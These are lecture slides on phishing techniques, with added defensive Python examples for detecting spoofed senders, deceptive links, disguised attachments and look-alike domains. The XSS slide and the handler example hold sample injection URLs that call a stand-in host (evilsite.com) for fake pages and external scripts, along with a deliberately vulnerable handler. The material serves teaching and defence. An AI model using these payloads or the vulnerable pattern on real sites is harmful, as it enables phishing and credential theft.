Phishing
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh

About me
Currently, Lecturer in this department for 351 days
Former Research Intern in M3C Laboratory, University of Bolton, UK

For you
Email me at [email protected] if you want
My homepage and course materials are at http://rushdishams.googlepages.com
You need to join http://groups.google.com/group/csebatchesofrushdi

Phishing
The number of unique e-mail-based fraud attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)
Phishing e-mails pretend to come from legitimate companies, such as banks and e-commerce sites
Used by criminals to try and trick Web users into revealing personal information and account details

Phishing
The number of brands targeted increased by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006
"One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director)

Phishing
Top brands continue to be hijacked, with phishers using established names to try to lure people to their sites
eBay is often spoofed, for obvious reasons
Google is increasingly being targeted because of its expansion into different business application models
The big banking names are used too: HSBC, Citigroup, Lloyds, all the major brands

Phishing
There's no point in using local names if the attack is global
Attacks are becoming increasingly sophisticated
Web sites are hosting keylogging malicious software
Before, people had to click on a site to download malicious code. If they thought a web site 'phishy', they could leave and probably not be harmed. Now, with most phishing sites they just have to visit one to become infected

Phishing
Twenty-five percent of those sites now host keylogging code
If you visit one you will probably open yourself to identity theft or fraud

Exploiting the Weakness
Why is it that crooks are able to mount an attack? What are the weaknesses that they exploit?
Richness of functionality: complex systems can have program bugs
Increasing interconnectivity: separate functions of any system are combined and interconnected via the Internet

Exploiting the Weakness
Expanding market in exploits: very little is required of the attacker, as the technical gadgets are impressive and cheap
The scale of content-based attacks: everyone uses e-mail, and e-mail is exploitable. Then why not?

Social Engineering Factors
Phishing attacks rely upon a mix of technical deceit and social engineering practices
In the majority of cases the phisher must persuade the victim: the victim intentionally performs a series of actions that will provide access to confidential information

Social Engineering Factors
Communication channels such as email, web-pages, IRC and instant messaging services are popular
The phisher must impersonate a trusted source (e.g. the helpdesk of their bank, an automated support response from their favourite online retailer, etc.) for the victim to believe

Social Engineering Factors

Phishing Techniques
Phishing attacks initiated by email are the most common
Using a Trojan network, phishers can deliver specially crafted emails to millions of legitimate “live” email addresses within a few hours
Sometimes phishers purchase e-mail addresses

Phishing Techniques
Utilising well known flaws in the common mail server communication protocol (SMTP), phishers are able to create emails with fake “Mail From:” headers and impersonate any organisation they choose
Any customer replies to the phishing email will be sent to them

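The slide explains the sender-side trick; the receiving side is where it can be caught. The example below is added here and is not from the lecture or the referenced guide: it reads a delivered message with Python's standard `email` module and compares the displayed From: domain against the envelope sender (Return-Path) and the Authentication-Results header that a receiving mail server writes after its SPF and DKIM checks (RFC 8601). Both sample messages, their domains and their header values are constructed for the example.

```python
"""Added example: spotting a forged "Mail From:" on the receiving side.
Assumes the receiving MTA has already added an Authentication-Results
header; the two messages below are constructed, not real mail."""
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: envelope sender and authentication results disagree
# with the From: header the user sees.
SAMPLE_SPOOFED = """\
Return-Path: <bounce@userdll.example>
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=userdll.example; dkim=none
From: "MyBank Security" <security@mybank.example>
To: customer@example.net
Subject: Please verify your account

Click here to verify your account.
"""

# Constructed sample: everything lines up with the From: domain.
SAMPLE_LEGIT = """\
Return-Path: <security@mybank.example>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=mybank.example; dkim=pass header.d=mybank.example
From: "MyBank Security" <security@mybank.example>
To: customer@example.net
Subject: Your monthly statement

Your statement is ready.
"""


def sender_domain(addr_header):
    """Lower-cased domain part of an address header ('' if there is none)."""
    _, addr = parseaddr(addr_header or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def auth_results(msg):
    """Turn 'spf=pass', 'dkim=none', 'header.d=...' tokens into a dict."""
    results = {}
    for field in msg.get_all("Authentication-Results", []):
        for part in field.split(";")[1:]:  # first part is the authserv-id
            for token in part.split():
                if "=" in token:
                    key, value = token.split("=", 1)
                    results[key] = value.lower()
    return results


def spoofing_findings(raw_message):
    """Return the reasons the From: header should not be trusted (empty = none)."""
    msg = message_from_string(raw_message)
    findings = []
    from_dom = sender_domain(msg["From"])
    envelope_dom = sender_domain(msg["Return-Path"])
    if envelope_dom and envelope_dom != from_dom:
        findings.append(f"envelope sender {envelope_dom} differs from From: domain {from_dom}")
    auth = auth_results(msg)
    if auth.get("spf") != "pass":
        findings.append(f"SPF result is {auth.get('spf', 'missing')}")
    if auth.get("dkim") != "pass":
        findings.append(f"DKIM result is {auth.get('dkim', 'missing')}")
    elif auth.get("header.d") != from_dom:
        findings.append("DKIM signature is for a different domain")
    return findings


if __name__ == "__main__":
    for label, sample in (("spoofed", SAMPLE_SPOOFED), ("legit", SAMPLE_LEGIT)):
        print(label, "->", spoofing_findings(sample) or "no issues")
```

A gateway would act on a non-empty finding list (quarantine, or tag the subject); a user-facing client can show the same information as a warning banner. The check depends on the sending organisation publishing SPF and DKIM records, which is exactly what closes the "fake Mail From:" hole the slide describes.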
Phishing Techniques
Official looking and sounding emails
Copies of legitimate corporate emails with minor URL changes
HTML based email used to obfuscate target URL information
Standard virus/worm attachments to emails

Phishing Techniques
A plethora of anti spam-detection inclusions
Crafting of “personalised” or unique email messages
Fake postings to popular message boards and mailing lists
Use of fake “Mail From:” addresses and open mail relays for disguising the source of the email

A real-life phishing example

Things to note
The email was sent in HTML format
Lower-case L’s have been replaced with upper-case I’s. This is used to help bypass many standard anti-spam filters

Things to note
Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to an escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index.htm

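Every trick in the Westpac message is visible to a program that looks at the anchor rather than at the rendered text. The following example is added here (it is not from the lecture or the referenced guide): it parses the anchors of an HTML email with Python's standard `html.parser`, percent-decodes each `href` before reading its host and port, and compares what the link shows with where it goes. The HTML is a constructed reproduction of the pattern on the slide, using the slide's host names; it is not the original message.

```python
"""Added example: checking the links of an HTML email the way a mail gateway
would. SAMPLE_HTML is constructed from the pattern on the slide."""
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed HTML: the visible text looks like the bank, while the href is
# percent-encoded and points at a different host on a non-standard port.
SAMPLE_HTML = (
    "<p>Please log in to confirm your details:</p>"
    '<a href="http://%6F%6C%62.westpac.com.au.userdll.com:4903/ib/index.htm">'
    "https://oIb.westpac.com.au/ib/defauIt.asp</a>"
)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def looks_like_url(text):
    """Only compare link text against the href when the text itself is a URL."""
    return " " not in text and "." in text


def analyse_link(href, text):
    """Return a list of warnings for one anchor (empty list = nothing odd)."""
    warnings = []
    real = urlsplit(unquote(href))  # decode %xx escapes before parsing
    shown = urlsplit(text if "://" in text else "http://" + text) if looks_like_url(text) else urlsplit("")
    if shown.hostname and real.hostname and shown.hostname != real.hostname:
        warnings.append(f"text shows {shown.hostname} but link goes to {real.hostname}")
    if real.port not in (None, 80, 443):
        warnings.append(f"non-standard port {real.port}")
    if shown.scheme == "https" and real.scheme != "https":
        warnings.append("text promises https but link is " + real.scheme)
    # Host names are case-insensitive, so a capital I inside an otherwise
    # lower-case host is a strong hint of the l/I substitution from the slide.
    # netloc keeps the original case (hostname is lower-cased by urlsplit).
    if "I" in shown.netloc or "I" in real.netloc:
        warnings.append("upper-case I in host name (possible l/I substitution)")
    return warnings


def scan_html(html):
    """Map each href in the document to its list of warnings."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    return {href: analyse_link(href, text) for href, text in parser.links}


if __name__ == "__main__":
    for href, warnings in scan_html(SAMPLE_HTML).items():
        print(href)
        for warning in warnings:
            print("  -", warning)
```

On the constructed sample the scan reports all four points the slide makes: the displayed host differs from the real one, the port is 4903, the text promises HTTPS while the link is plain HTTP, and the host name contains a capital I. A mail filter would score on these signals rather than on the visible text, which is exactly what the l/I substitution was meant to defeat.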
Things to note

Things to note
The non-standard HTTP port of 4903 can be attributed to the fact that the phisher's fake site was hosted on a third-party PC that had been previously compromised by an attacker

Things to note
Recipients that clicked on the link were then forwarded to the real Westpac application
However, a JavaScript popup window containing a fake login page was presented to them

Things to note
This fake login window was designed to capture and store the recipient’s authentication credentials
JavaScript also submitted the authentication information to the real Westpac application

Where are they standing now?
The inclusion of HTML disguised links
The use of third-party supplied, or fake, banner advertising graphics to lure customers
The use of web-bugs (hidden items within the page, such as a zero-sized graphic) to track a potential customer
The use of pop-up or frameless windows to disguise the true source of the phisher's message

Where are they standing now?
Embedding malicious content within the viewable web-page installs software of the phisher's choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs)

Banner Advertising

IRC and IM
New on the phishers' radar, IRC and Instant Messaging (IM) forums are likely to become a popular phishing ground
The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels,

Trojan Hosts
The delivery source is increasingly becoming home PCs that have been previously compromised
A Trojan horse program has been installed which allows phishers (along with spammers, warez pirates, DDoS bots, etc.) to use the PC as a message propagator
Tracking back a phishing attack to the individual initiating criminal is extremely difficult

Trojan Hosts
The installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies
Phishers operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)
Phishers must be selective about the information they wish to record or be faced with information overload

Information Specific Trojans
You have come across a file named JavaUtil.zip. But you forgot that you have “do not show known file extensions” set in Windows. Then JavaUtil.zip may originally be a .exe file whose full name is JavaUtil.zip.exe. You, unfortunately, click that zip file to unzip it. You are doomed!

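The JavaUtil.zip.exe trick only works because the last extension is hidden from the user, so the defence is to look at the whole file name before it reaches a mailbox. The example below is added here and is not from the lecture: it classifies attachment names by their last two extensions and also catches the related variant where many spaces push the real extension out of view. The file names are constructed, and the extension lists are an assumed starting point rather than a complete policy.

```python
"""Added example: flagging attachment names that rely on Windows hiding the
final extension. File names and extension lists are constructed assumptions."""
import os

# Extensions Windows runs on double-click (assumed, not exhaustive).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta"}
# Extensions a user expects to open as an inert document or archive (assumed).
BENIGN_EXTS = {".zip", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".txt"}


def displayed_name(filename):
    """What Explorer shows with 'Hide extensions for known file types' on."""
    base, _ = os.path.splitext(filename)
    return base


def classify_attachment(filename):
    """Return None for an honest-looking name, otherwise a short reason."""
    base, last = os.path.splitext(filename)
    last = last.lower()
    # Extension that would be shown to the user once the real one is hidden;
    # strip() handles 'invoice.pdf          .scr'-style padding.
    _, second = os.path.splitext(base.rstrip())
    second = second.lower()
    if last in EXECUTABLE_EXTS and second in BENIGN_EXTS:
        reason = f"executable disguised as {second}, shown to the user as {displayed_name(filename).rstrip()!r}"
        if base != base.rstrip():
            reason += " (name padded with spaces)"
        return reason
    if last in EXECUTABLE_EXTS:
        return "executable attachment"
    return None


def scan_attachments(names):
    """Map each attachment name to its verdict."""
    return {name: classify_attachment(name) for name in names}


if __name__ == "__main__":
    # Constructed attachment names, including the one from the slide.
    samples = ["JavaUtil.zip.exe", "report.pdf", "setup.exe", "invoice.pdf          .scr"]
    for name, verdict in scan_attachments(samples).items():
        print(f"{name!r}: {verdict or 'ok'}")
```

A mail gateway would block the first and last names outright and quarantine plain executables; on the desktop, the matching mitigation is to turn the "hide extensions" setting off so the user sees the same thing the filter does.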
Information Specific Trojans
Early in 2004, a phisher created a custom key-logger Trojan
The Trojan key-logger was designed specifically to capture all key presses within windows with the titles of various names including: commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank

Phishing Attack Vectors
Man-in-the-middle Attacks
URL Obfuscation Attacks
Cross-site Scripting Attacks
Preset Session Attacks

Man in the Middle Attacks
The attacker situates themselves between the customer and the real web-based application, and proxies all communications between the systems
This form of attack is successful for both HTTP and HTTPS communications
The customer connects to the attacker's server as if it was the real site
The attacker's server makes a simultaneous connection to the real site

Man in the Middle Attacks
The attacker's server then proxies all communications between the customer and the real web-based application server
In the case of secure HTTPS communications, an SSL connection is established between the customer and the attacker's proxy, while the attacker's proxy creates its own SSL connection between itself and the real server

Man in the Middle Attacks

Man in the Middle Attacks
The attacker must be able to direct the customer to their proxy server instead of the real server
This may be carried out through a number of methods:
Transparent Proxies
DNS Cache Poisoning
URL Obfuscation

Transparent Proxies
Situated on the same network segment or located on the route to the real server, a transparent proxy service can intercept all data by forcing all outbound HTTP and HTTPS traffic through itself

DNS Cache Poisoning
DNS cache poisoning can be used to disrupt normal traffic routing by injecting false IP addresses for key domain names
The attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attacker's proxy server IP address

URL Obfuscation
The attacker tricks the customer into connecting to their proxy server instead of the real server
The customer may follow a link to:
http://privatebanking.mybank.com.ch
http://mybank.privatebanking.com
http://privatebanking.mybonk.com
http://privatebanking.mybánk.com
http://privatebanking.mybank.hackproof.com
And the real one is http://privatebanking.mybank.com

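Each of the five look-alikes on the slide fools the eye in a different way, and each is caught by a different check. The example below is added here and is not from the lecture or the referenced guide: it classifies a URL's host against the legitimate host from the slide by extracting the registrable domain, folding accented characters, and measuring edit distance to the brand label. The registrable-domain logic assumes a plain name.tld layout (a real tool would consult the Public Suffix List), and mybank.com is the slide's placeholder, not a real bank.

```python
"""Added example: classifying look-alike host names against a legitimate one.
LEGIT_HOST and the sample URLs are the slide's placeholders; the registrable
domain logic is a deliberate simplification (no Public Suffix List)."""
import unicodedata
from urllib.parse import urlsplit

LEGIT_HOST = "privatebanking.mybank.com"


def registrable_domain(host):
    """Last two labels of the host. Simplification: ignores suffixes like co.uk."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def skeleton(label):
    """Strip accents so 'mybánk' compares equal to 'mybank' (a small subset
    of the Unicode confusables skeleton)."""
    return unicodedata.normalize("NFKD", label).encode("ascii", "ignore").decode().lower()


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url, legit_host=LEGIT_HOST):
    """Describe how the host in url relates to legit_host."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    if host == legit_host:
        return "legitimate"
    legit_reg, host_reg = registrable_domain(legit_host), registrable_domain(host)
    brand = legit_reg.split(".")[0]  # "mybank"
    if host_reg == legit_reg:
        return "legitimate domain, unexpected subdomain"
    if any(ord(ch) > 127 for ch in host):
        if skeleton(host_reg) == legit_reg:
            return f"IDN homograph of {legit_reg}"
        return "internationalised host name, inspect characters"
    if host.startswith(legit_host + "."):
        return f"legitimate host name extended with extra labels; registered domain is {host_reg}"
    if brand in host.split("."):
        return f"brand name used as a subdomain of {host_reg}"
    distance = edit_distance(brand, host_reg.split(".")[0])
    if distance <= 2:
        return f"typo-squat of {legit_reg} (edit distance {distance})"
    return "unrelated host"


if __name__ == "__main__":
    for url in (
        "http://privatebanking.mybank.com.ch",
        "http://mybank.privatebanking.com",
        "http://privatebanking.mybonk.com",
        "http://privatebanking.mybánk.com",
        "http://privatebanking.mybank.hackproof.com",
        "http://privatebanking.mybank.com",
    ):
        print(f"{url}: {classify(url)}")
```

The important design point is that the registrable domain, not the full host string, decides ownership: "mybank" appearing anywhere left of the registered domain means nothing, which is why two of the slide's examples are reported as the brand used as someone else's subdomain. Browser and mail-filter brand-protection lists work on the same principle.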
Third party shortened URL

Cross Site Scripting (XSS)
Cross-site scripting attacks make use of custom URL or code injection into a valid web-based application URL
They are the result of poor web-application development processes

Cross Site Scripting (XSS)
Full HTML substitution, such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
Inline embedding of scripting content, such as:
http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
Forcing the page to load external scripting code, such as:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2

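All three URLs on the slide work against the same kind of handler: one that copies request parameters straight into a redirect, into the page body, or into a script tag. The example below is added here and is not from the lecture or the referenced guide. It models the application as a plain Python function over a query string (no web framework) and shows the vulnerable handler next to a hardened one; `mybank.com`, the parameter names `URL`, `client` and `response`, and the allow-lists are the slide's placeholders and my assumptions.

```python
"""Added example: the slide's three injection points as a vulnerable handler
beside its hardened form. Hosts and parameter names are placeholders."""
import html
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_REDIRECT_HOSTS = {"mybank.com", "www.mybank.com"}  # assumed allow-list
ALLOWED_SCRIPT_HOSTS = {"static.mybank.com"}               # assumed allow-list


def _params(query):
    """First value of each query parameter (parse_qs also decodes %21 -> '!')."""
    return {key: values[0] for key, values in parse_qs(query).items()}


def vulnerable_page(query):
    """Trusts every parameter: open redirect, reflected XSS, remote script load."""
    q = _params(query)
    if "URL" in q:
        return {"redirect": q["URL"]}                      # full HTML substitution
    body = "<h1>Welcome " + q.get("client", "") + "</h1>"  # inline script injection
    if "response" in q:
        host, _, filename = q["response"].partition("!")
        body += f'<script src="http://{host}/{filename}"></script>'  # external script
    return {"html": body}


def safe_redirect_target(url):
    """Accept a relative path or an https URL on our own hosts; otherwise go home."""
    if any(ch in url for ch in "\\\r\n"):
        return "/"
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "" and url.startswith("/") and not url.startswith("//"):
        return url
    if parts.scheme == "https" and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return url
    return "/"


def hardened_page(query):
    """Same features, with each parameter validated or encoded for its context."""
    q = _params(query)
    if "URL" in q:
        return {"redirect": safe_redirect_target(q["URL"])}
    # HTML-encode anything reflected into the page body.
    body = "<h1>Welcome " + html.escape(q.get("client", "")) + "</h1>"
    if "response" in q:
        host, _, filename = q["response"].partition("!")
        # Only scripts from our own host, with a plain file name, are referenced.
        if host in ALLOWED_SCRIPT_HOSTS and re.fullmatch(r"[\w.-]+\.js", filename):
            body += f'<script src="https://{host}/{filename}"></script>'
    return {"html": body}


if __name__ == "__main__":
    for query in (
        "URL=http://evilsite.com/phishing/fakepage.htm",
        "page=1&client=<SCRIPT>evilcode",
        "page=1&response=evilsite.com%21evilcode.js&go=2",
    ):
        print(query)
        print("  vulnerable:", vulnerable_page(query))
        print("  hardened:  ", hardened_page(query))
```

The hardened version applies one rule per context: redirect targets are validated against an allow-list (a relative path or a known host, never a scheme-relative `//host`), reflected text is HTML-escaped, and script sources are chosen by the application rather than by the request. A Content-Security-Policy header restricting `script-src` to the application's own hosts would back up the last two controls in the browser.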
Cross Site Scripting (XSS)

Preset Session Attack

Hidden Frame

Graphical Substitution

References
The Phishing Guide by Next Generation Security Software Limited

Related Papers
Technical Trends in Phishing Attacks by Jason Milletary
Why Phishing Works by Dhamija et al.